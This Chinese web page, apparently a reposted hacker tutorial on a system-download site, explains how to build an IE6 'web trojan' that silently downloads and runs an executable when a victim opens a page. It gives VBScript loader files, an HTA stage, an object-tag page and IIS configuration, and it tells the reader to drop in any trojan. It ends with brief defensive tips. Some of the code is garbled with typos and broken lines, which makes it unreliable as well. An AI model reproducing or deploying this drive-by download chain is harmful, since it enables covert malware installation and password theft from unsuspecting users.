|
網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。 我們經常聽到這樣的忠告:“不要隨意下在不明的程序,不要隨意打開郵件的附件...”這樣的忠告確實是有用的,不過我們的系統有不少漏洞,許多木馬已經不需要客戶端和服務端了,他們利用這些系統漏洞按照被系統認為合法的代碼執行木馬的功能,有的木馬會在你完全不知道的情況下潛入,現在我來講解下通過IE6的漏洞實現訪問網頁后神不知鬼不覺的下在并執行指定程序的例子,也就是網頁木馬.首先我們需要編寫幾個簡單的文件 一、名字為abc.abc的文件 <html> <script language="vbscript"> Function HttpDoGet(url) set oReq = CreateObject("Microsoft.XMLHTTP") oReq.open "GET",url,false oReq.send If oReq.status=200 then HttpDoGet=oReq.respomseBody Savefile HttpDoGet,"c:\win.exe" End If Set oReq=nothing End Function sub SaveFile(str.fName) Set objStream = CreateObject("ADODB.Stream") objStream.Type =1 objStream.Open objStream.write str objStream.SaveToFile fName.2 objStream.Close() set objStream = nothing exewin() End sub Sub exewin() set wshshell=createobject ("wscript.shell" ) a=wshshell.run ("cmd.exe /c c:\win.exe",0) b=wshshell.run ("cmd.exe /c del c:\win.hta",0) window.close End Sub HttpDoGet "http://127.0.0.1/test.exe" </script> </html> 其中test.exe為木馬程序,實現必須放在WEB發布的目錄下,文件abc.abc也必須保存在發布的目錄下。 二、名字為test.htm的文件 <html><body> 木馬運行測試!(這句話可以改成你想說的) <object date="http://127.0.0.1/win.test";;;></object> </body></html> 三、名字為win.test的文件 <html> <body> <script language="vbscript"> Function HttpDoGet(url) set oReq = CreateObject("Microsoft.XMLHTTP") oReq.open "GET",url,false oReq.send If oReq.status=200 then HttpDoGet,"c:\win.hta" Set oReq=nothing End if end function sub SaveFile(str,fName) Dim fso, tf S e t f s o = C r e a t e O b j e c t(Scripting.FileSystemObject") Set tf = fso.CreateTextfile(fName,True) tf.Write str tf.Close exewin() End sub Sub exewin() set wshshell=createobject ("wscript.shell" ) a=wshshell.run ("cmd.exe /c c:\win.hat",0) window.close End Sub HttpDoGet("http://127.0.0.1/abc.abc") </script> </body> </html> [page_break]四、名字為test.exe的木馬程序。 暈...這個就不用我提供了吧,你想用什么木馬就把他的名字換成test.exe傳上去就可以了。 服務器的文件列表 test.htm:對外發布的網頁 win.test:下在文件abc.abc到對方機器上,并且保存為win.hta并且執行。 abc.abc下載二進制的木馬文件test.exe,并執行。 test.exe:木馬程序。 上面所說的文件可以修改成任意名字,只是不要忘記把源碼里的文件指向也修改就可以了! 最后是設置IIS,打開“程序→管理工具→internet服務管理器”,右鍵單擊要設置的站點,選擇《屬性》,在選擇“http頭”。單擊“MIME映射”里的“文件類型”按鈕,并在關聯擴展名文本框中輸入“.hta”,在內容類型(MIME)中輸入“application/hta",然后關閉所有窗口就可以了。 有許多朋友多遇見過,說什么贈送Q號或者玩網游的時候里面有人喊贈送好東東在XXX網址,其實那上面所說的例子用的就是這種原理,不知不覺中你機器上的所有有關于密碼或者指定名詞的東西全發送到對方指定的郵件箱里去了 看完后是否覺得這種木馬太危險,甚至有種想把網線拔掉的感覺那?呵呵,其實了解了網頁木馬的工作原理后我們就不難防護他,看完以上內容后就可以得出一個結論,網頁木馬主要利用IE的漏洞來實現的,所以在預防的時候一定要做到以下幾點就可以保證上網的安全了, A、安裝IE的最新版本并且隨時下在才做系統和IE的補丁程序。 B、不隨便登陸不熟悉朋友送來的網站,對于熟悉的朋友也要小心哦。 C、不隨便登陸黑客網站(^_^黑基除外了啦,我擔保的...),色情網站,尤其一些賣外掛,賣木馬的網站。 D、不隨便打開和預覽有附件的郵件。 E、安裝防火墻和殺毒軟件的最新版本,經常進行升級和查毒。 網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。 |
溫馨提示:喜歡本站的話,請收藏一下本站!
本站發布的Win7純凈版系統、Win10純凈版和XP純凈版系統僅為個人學習測試使用,請在下載后24小時內刪除,不得用于任何商業用途,否則后果自負,請支持購買微軟正版軟件!
本站所有資源全部來自于網絡資源,如侵犯到您的權益,請及時通知我們(),我們會及時處理.
Copyright © 2018-2020 蘿卜系統 手機站 關于本站
